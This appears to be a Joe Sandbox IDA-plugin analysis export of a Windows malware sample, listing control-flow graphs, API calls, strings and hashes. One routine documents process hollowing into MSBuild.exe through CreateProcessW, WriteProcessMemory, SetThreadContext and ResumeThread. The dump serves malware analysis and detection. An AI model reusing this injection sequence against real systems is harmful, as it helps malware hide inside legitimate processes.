19982->19983 19984 5a86e9 19982->19984 19984->19983 19987 5b1cf7 19984->19987 19986 5a8711 19988 5b1d09 19987->19988 19992 5b1d12 ___scrt_uninitialize_crt 19987->19992 19989 5b1e75 ___scrt_uninitialize_crt 68 API calls 19988->19989 19990 5b1d0f 19989->19990 19990->19986 19991 5b1d21 19991->19986 19992->19991 19995 5b1ffa 19992->19995 19996 5b2006 ___scrt_is_nonwritable_in_current_image 19995->19996 20003 5acd0f EnterCriticalSection 19996->20003 19998 5b2014 19999 5b1d53 ___scrt_uninitialize_crt 68 API calls 19998->19999 20000 5b2025 19999->20000 20004 5b204e 20000->20004 20003->19998 20007 5acd23 LeaveCriticalSection 20004->20007 20006 5b1d48 20006->19986 20007->20006 16700 5d019e 16707 5d01d4 16700->16707 16701 5d0321 GetPEB 16702 5d0333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16701->16702 16703 5d03da WriteProcessMemory 16702->16703 16702->16707 16704 5d041f 16703->16704 16705 5d0424 WriteProcessMemory 16704->16705 16706 5d0461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16704->16706 16705->16704 16707->16701 16707->16702 20139 5a8680 20140 5a868f 20139->20140 20142 5a86b3 20140->20142 20143 5b2c1b 20140->20143 20144 5b2c2e _Fputc 20143->20144 20147 5b2c88 20144->20147 20146 5b2c43 _Fputc 20146->20142 20148 5b2c9a 20147->20148 20149 5b2cbd 20147->20149 20150 5b1778 _Fputc 29 API calls 20148->20150 20149->20148 20152 5b2ce4 20149->20152 20151 5b2cb5 20150->20151 20151->20146 20155 5b2dbe 20152->20155 20156 5b2dca ___scrt_is_nonwritable_in_current_image 20155->20156 20163 5acd0f EnterCriticalSection 20156->20163 20158 5b2dd8 20164 5b2d1e 20158->20164 20160 5b2de5 20173 5b2e0d 20160->20173 20163->20158 20165 5b1db8 ___scrt_uninitialize_crt 64 API calls 20164->20165 20166 5b2d39 20165->20166 20167 5b789d 14 API calls 20166->20167 20168 5b2d43 20167->20168 20169 5b62f4 __Getctype 14 API calls 20168->20169 20172 5b2d5e 20168->20172 20170 5b2d82 20169->20170 20171 5b4fb7 ___free_lconv_mon 14 API calls 20170->20171 20171->20172 20172->20160 20176 5acd23 LeaveCriticalSection 20173->20176 20175 5b2d1c 20175->20146 20176->20175

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,005D0110,005D0100), ref: 005D0334
                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005D0347
                                                                                            • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 005D0365
                                                                                            • ReadProcessMemory.KERNELBASE(00000094,?,005D0154,00000004,00000000), ref: 005D0389
                                                                                            • VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 005D03B4
                                                                                            • WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 005D040C
                                                                                            • WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 005D0457
                                                                                            • WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 005D0495
                                                                                            • Wow64SetThreadContext.KERNEL32(00000098,039E0000), ref: 005D04D1
                                                                                            • ResumeThread.KERNELBASE(00000098), ref: 005D04E0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                            • API String ID: 2687962208-3857624555
                                                                                            • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                            • Instruction ID: 10bbca99a9e39ac1c95ba2eb8e2fd0ba82f6786416c39638528e60b949801759
                                                                                            • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                            • Instruction Fuzzy Hash: 8DB1067660168AAFDB60CF6CCC80BDA77A5FF88714F158525EA08AB341D770FA41CB94

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AddressCloseCreateHandleProcSize
                                                                                            • String ID: CreateFileA
                                                                                            • API String ID: 2547132502-1429953656
                                                                                            • Opcode ID: 1681f709b51a05f6f0a2de2726b078c5f5881168f9a7cfc67cb8992ea0f873bd
                                                                                            • Instruction ID: e26128fcc16fb39864df3f2d42ed28a0664897acb19872b36cec4cf629f45699
                                                                                            • Opcode Fuzzy Hash: 1681f709b51a05f6f0a2de2726b078c5f5881168f9a7cfc67cb8992ea0f873bd
                                                                                            • Instruction Fuzzy Hash: 6441C3B0D086499FCB00EFA8D4996AEBFF0BF49314F008929E899A7350D7749548DF96

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$AddressCloseConsoleCreateFreeModuleObjectProcSingleThreadWait
                                                                                            • String ID: FreeConsole$kernel32.dll
                                                                                            • API String ID: 1818784962-2564406000
                                                                                            • Opcode ID: d51343227a9c35e26b85539b3b1d7d16e2c74d9c0cc340b56cfd217483260b84
                                                                                            • Instruction ID: 22418aa48872a44d42e8af74aef07f8e4a44e0b0c68a2eca710b91aaa560420f
                                                                                            • Opcode Fuzzy Hash: d51343227a9c35e26b85539b3b1d7d16e2c74d9c0cc340b56cfd217483260b84
                                                                                            • Instruction Fuzzy Hash: A621A8B09046099FCB40EFB8D94979EBBF0FB44304F00892EE855D7250EB749648DB82

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 45 5b5f42-5b5f4e 46 5b5fe0-5b5fe3 45->46 47 5b5fe9 46->47 48 5b5f53-5b5f64 46->48 49 5b5feb-5b5fef 47->49 50 5b5f71-5b5f8a LoadLibraryExW 48->50 51 5b5f66-5b5f69 48->51 54 5b5f8c-5b5f95 GetLastError 50->54 55 5b5ff0-5b6000 50->55 52 5b6009-5b600b 51->52 53 5b5f6f 51->53 52->49 57 5b5fdd 53->57 58 5b5fce-5b5fdb 54->58 59 5b5f97-5b5fa9 call 5b9604 54->59 55->52 56 5b6002-5b6003 FreeLibrary 55->56 56->52 57->46 58->57 59->58 62 5b5fab-5b5fbd call 5b9604 59->62 62->58 65 5b5fbf-5b5fcc LoadLibraryExW 62->65 65->55 65->58
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(00000000,?,005B6051,00000000,00000000,00000000,?,?,?,005B5CCF,00000022,FlsSetValue,005C8AF8,005C8B00,?), ref: 005B6003
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 3664257935-537541572
                                                                                            • Opcode ID: 348ba05df28931c2218ab2b228332845534098102d9bfd655ee7996ffe7725b1
                                                                                            • Instruction ID: e6ae34e3b3e99607cd64156593aa52c4a435ff7717e3aaa71c929e793fb71fd9
                                                                                            • Opcode Fuzzy Hash: 348ba05df28931c2218ab2b228332845534098102d9bfd655ee7996ffe7725b1
                                                                                            • Instruction Fuzzy Hash: 112105B2A02A14ABC7369B249C45FAA7F59FB513A0F250121FE15A7280F730FD04D6D0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 66 5b672a-5b6743 67 5b6759-5b675e 66->67 68 5b6745-5b6755 call 5aed2d 66->68 70 5b676b-5b6791 call 5b503f 67->70 71 5b6760-5b6768 67->71 68->67 74 5b6757 68->74 76 5b6907-5b6918 call 5a6d61 70->76 77 5b6797-5b67a2 70->77 71->70 74->67 79 5b68fa 77->79 80 5b67a8-5b67ad 77->80 84 5b68fc 79->84 82 5b67af-5b67b8 call 5a9b40 80->82 83 5b67c6-5b67d1 call 5b4ff1 80->83 82->84 91 5b67be-5b67c4 82->91 83->84 93 5b67d7 83->93 85 5b68fe-5b6905 call 5a9ad7 84->85 85->76 94 5b67dd-5b67e2 91->94 93->94 94->84 95 5b67e8-5b67fd call 5b503f 94->95 95->84 98 5b6803-5b6815 call 5b5df3 95->98 100 5b681a-5b681e 98->100 100->84 101 5b6824-5b682c 100->101 102 5b682e-5b6833 101->102 103 5b6866-5b6872 101->103 102->85 106 5b6839-5b683b 102->106 104 5b68ef 103->104 105 5b6874-5b6876 103->105 109 5b68f1-5b68f8 call 5a9ad7 104->109 107 5b688b-5b6896 call 5b4ff1 105->107 108 5b6878-5b6881 call 5a9b40 105->108 106->84 110 5b6841-5b685b call 5b5df3 106->110 107->109 121 5b6898 107->121 108->109 120 5b6883-5b6889 108->120 109->84 110->85 119 5b6861 110->119 119->84 122 5b689e-5b68a3 120->122 121->122 122->109 123 5b68a5-5b68bd call 5b5df3 122->123 123->109 126 5b68bf-5b68c6 123->126 127 5b68c8-5b68c9 126->127 128 5b68e7-5b68ed 126->128 129 5b68ca-5b68dc call 5b5101 127->129 128->129 129->109 132 5b68de-5b68e5 call 5a9ad7 129->132 132->85
                                                                                            APIs
                                                                                            • __alloca_probe_16.LIBCMT ref: 005B67AF
                                                                                            • __alloca_probe_16.LIBCMT ref: 005B6878
                                                                                            • __freea.LIBCMT ref: 005B68DF
                                                                                              • Part of subcall function 005B4FF1: RtlAllocateHeap.NTDLL(00000000,005B6F75,?,?,005B6F75,00000220,?,?,?), ref: 005B5023
                                                                                            • __freea.LIBCMT ref: 005B68F2
                                                                                            • __freea.LIBCMT ref: 005B68FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1423051803-0
                                                                                            • Opcode ID: f9ac1f9ecfaa16f539fe7e042ddb3bd85bf33a862b6a6e66d94481d9e0ee5e42
                                                                                            • Instruction ID: 2cbe3a7ed44261ede45bee5f8ab337c58c38c72fc839f46dccda6108690d8df2
                                                                                            • Opcode Fuzzy Hash: f9ac1f9ecfaa16f539fe7e042ddb3bd85bf33a862b6a6e66d94481d9e0ee5e42
                                                                                            • Instruction Fuzzy Hash: C251BF72600647AFEB259E64CC89EFB3EE9FF85710F150439FD04D6152EA39ED1096A0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 135 5a2050-5a211e call 5a1000 * 2 GetProcAddress 140 5a212f-5a216b VirtualProtect 135->140 141 5a2124-5a212c 135->141 143 5a217c-5a2193 call 5a6d61 140->143 144 5a2171-5a2177 call 5a1cb0 140->144 141->140 144->143
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProcProtectVirtual
                                                                                            • String ID: @$VirtualProtect
                                                                                            • API String ID: 3759838892-29487290
                                                                                            • Opcode ID: 371984dadc5e790e9cb3aee65585b59620b190226eeaaa2833b59c0d2b9ab01c
                                                                                            • Instruction ID: e4a67fd3cc2d756b6335f8e3fde75938e12dc1fee7d9a710a6037f4afec099bc
                                                                                            • Opcode Fuzzy Hash: 371984dadc5e790e9cb3aee65585b59620b190226eeaaa2833b59c0d2b9ab01c
                                                                                            • Instruction Fuzzy Hash: 6941E4B0901209DFCB04DFA8D99969EBFF0FF48314F10842AE848AB390D7759988CF85

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,005AEF25,00000000,?,?,pZ,9BCBA9B0,?,005AED70), ref: 005AEE74
                                                                                            • TerminateProcess.KERNEL32(00000000,?,005AEF25,00000000,?,?,pZ,9BCBA9B0,?,005AED70), ref: 005AEE7B
                                                                                            • ExitProcess.KERNEL32 ref: 005AEE8D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: dd10d0371573e4d3c29be7b64362bf3bf687d8b0f07138d649d4cf82160d9f37
                                                                                            • Instruction ID: 55597049db2c9627dfdd0e9245dedb79543bd602e3674e7b424a389da59417f7
                                                                                            • Opcode Fuzzy Hash: dd10d0371573e4d3c29be7b64362bf3bf687d8b0f07138d649d4cf82160d9f37
                                                                                            • Instruction Fuzzy Hash: CCD09231000649AFCF813F60EC0FC5D3F6EBF95391B444010BA095A032DB32A996AA80

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 155 5bcca4-5bccc6 156 5bceb9 155->156 157 5bcccc-5bccce 155->157 160 5bcebb-5bcebf 156->160 158 5bccfa-5bcd1d 157->158 159 5bccd0-5bccef call 5b1778 157->159 162 5bcd1f-5bcd21 158->162 163 5bcd23-5bcd29 158->163 166 5bccf2-5bccf5 159->166 162->163 165 5bcd2b-5bcd3c 162->165 163->159 163->165 167 5bcd4f-5bcd5f call 5bcfd1 165->167 168 5bcd3e-5bcd4c call 5bba52 165->168 166->160 173 5bcda8-5bcdba 167->173 174 5bcd61-5bcd67 167->174 168->167 177 5bcdbc-5bcdc2 173->177 178 5bce11-5bce31 WriteFile 173->178 175 5bcd69-5bcd6c 174->175 176 5bcd90-5bcda6 call 5bd04e 174->176 179 5bcd6e-5bcd71 175->179 180 5bcd77-5bcd86 call 5bd415 175->180 196 5bcd89-5bcd8b 176->196 184 5bcdfd-5bce0a call 5bd47d 177->184 185 5bcdc4-5bcdc7 177->185 182 5bce3c 178->182 183 5bce33-5bce39 GetLastError 178->183 179->180 186 5bce51-5bce54 179->186 180->196 190 5bce3f-5bce4a 182->190 183->182 195 5bce0f 184->195 191 5bcde9-5bcdfb call 5bd641 185->191 192 5bcdc9-5bcdcc 185->192 199 5bce57-5bce59 186->199 197 5bce4c-5bce4f 190->197 198 5bceb4-5bceb7 190->198 202 5bcde4-5bcde7 191->202 192->199 200 5bcdd2-5bcddf call 5bd558 192->200 195->202 196->190 197->186 198->160 203 5bce5b-5bce60 199->203 204 5bce87-5bce93 199->204 200->202 202->196 208 5bce79-5bce82 call 5b0f70 203->208 209 5bce62-5bce74 203->209 206 5bce9d-5bceaf 204->206 207 5bce95-5bce9b 204->207 206->166 207->156 207->206 208->166 209->166
                                                                                            APIs
                                                                                              • Part of subcall function 005BD04E: GetConsoleOutputCP.KERNEL32(9BCBA9B0,00000000,00000000,?), ref: 005BD0B1
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,005AD402,?,005AD664), ref: 005BCE29
                                                                                            • GetLastError.KERNEL32(?,005AD402,?,005AD664,?,005AD664,?,?,?,?,?,?,?,?,?,?), ref: 005BCE33
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2915228174-0
                                                                                            • Opcode ID: 3ce4957283c39b5fb1f87022a003a89d5e0da90c346806c27ab85894dccb4079
                                                                                            • Instruction ID: 7ef3e2f92304fd2f7b21ec6829506b18def37606019cda570ea642a792fa1b1e
                                                                                            • Opcode Fuzzy Hash: 3ce4957283c39b5fb1f87022a003a89d5e0da90c346806c27ab85894dccb4079
                                                                                            • Instruction Fuzzy Hash: 1461B1B5D0015AAFDF12CFA8C884AFEBFB9BF59304F140555E814AB252D371E905CBA4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 212 5b6ba8-5b6bd0 call 5b6dad 215 5b6bd6-5b6bdc 212->215 216 5b6d95-5b6d96 call 5b6e1e 212->216 218 5b6bdf-5b6be5 215->218 219 5b6d9b-5b6d9d 216->219 220 5b6beb-5b6bf7 218->220 221 5b6ce1-5b6d00 call 5ac260 218->221 223 5b6d9e-5b6dac call 5a6d61 219->223 220->218 224 5b6bf9-5b6bff 220->224 229 5b6d03-5b6d08 221->229 227 5b6cd9-5b6cdc 224->227 228 5b6c05-5b6c11 IsValidCodePage 224->228 227->223 228->227 231 5b6c17-5b6c1e 228->231 232 5b6d0a-5b6d0f 229->232 233 5b6d45-5b6d4f 229->233 234 5b6c40-5b6c4d GetCPInfo 231->234 235 5b6c20-5b6c2c 231->235 238 5b6d42 232->238 239 5b6d11-5b6d19 232->239 233->229 240 5b6d51-5b6d7b call 5b70f9 233->240 236 5b6c4f-5b6c6e call 5ac260 234->236 237 5b6ccd-5b6cd3 234->237 241 5b6c30-5b6c3b 235->241 236->241 253 5b6c70-5b6c77 236->253 237->216 237->227 238->233 244 5b6d1b-5b6d1e 239->244 245 5b6d3a-5b6d40 239->245 251 5b6d7c-5b6d8b 240->251 242 5b6d8d-5b6d8e call 5b7137 241->242 252 5b6d93 242->252 249 5b6d20-5b6d26 244->249 245->232 245->238 249->245 254 5b6d28-5b6d38 249->254 251->242 251->251 252->219 255 5b6c79-5b6c7e 253->255 256 5b6ca3-5b6ca6 253->256 254->245 254->249 255->256 257 5b6c80-5b6c88 255->257 258 5b6cab-5b6cb2 256->258 259 5b6c9b-5b6ca1 257->259 260 5b6c8a-5b6c91 257->260 258->258 261 5b6cb4-5b6cc8 call 5b70f9 258->261 259->255 259->256 262 5b6c92-5b6c99 260->262 261->241 262->259 262->262
                                                                                            APIs
                                                                                              • Part of subcall function 005B6DAD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 005B6DD8
                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,005B6FB8,?,00000000,?,?,?), ref: 005B6C09
                                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,005B6FB8,?,00000000,?,?,?), ref: 005B6C45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CodeInfoPageValid
                                                                                            • String ID:
                                                                                            • API String ID: 546120528-0
                                                                                            • Opcode ID: 34cb681ced8687bcafb7dc70c088343ea9f5227550f49463ba4a2e28968325b8
                                                                                            • Instruction ID: 5050c5d5fd9e93d41b42c941a6209a1f5b8a893394a91e657b895a796a542037
                                                                                            • Opcode Fuzzy Hash: 34cb681ced8687bcafb7dc70c088343ea9f5227550f49463ba4a2e28968325b8
                                                                                            • Instruction Fuzzy Hash: B8512174A006499EDB20CF75C8956EBBFF5FF85300F18846FD0868B292D678B945CB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 265 5bd47d-5bd4d2 call 5a9c20 268 5bd547-5bd557 call 5a6d61 265->268 269 5bd4d4 265->269 270 5bd4da 269->270 272 5bd4e0-5bd4e2 270->272 274 5bd4fc-5bd521 WriteFile 272->274 275 5bd4e4-5bd4e9 272->275 278 5bd53f-5bd545 GetLastError 274->278 279 5bd523-5bd52e 274->279 276 5bd4eb-5bd4f1 275->276 277 5bd4f2-5bd4fa 275->277 276->277 277->272 277->274 278->268 279->268 280 5bd530-5bd53b 279->280 280->270 281 5bd53d 280->281 281->268
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,005BCE0F,?,005AD664,?,?,?,00000000), ref: 005BD519
                                                                                            • GetLastError.KERNEL32(?,005BCE0F,?,005AD664,?,?,?,00000000,?,?,?,?,?,005AD402,?,005AD664), ref: 005BD53F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 75a41700bcff658e57f85686b9395d44d1a3a513cfbd95b270a1179963fd9664
                                                                                            • Instruction ID: 5c2784771375f0a31d9f5d5cf56aade7f390b822900570fc95cfd6f4ca75afb6
                                                                                            • Opcode Fuzzy Hash: 75a41700bcff658e57f85686b9395d44d1a3a513cfbd95b270a1179963fd9664
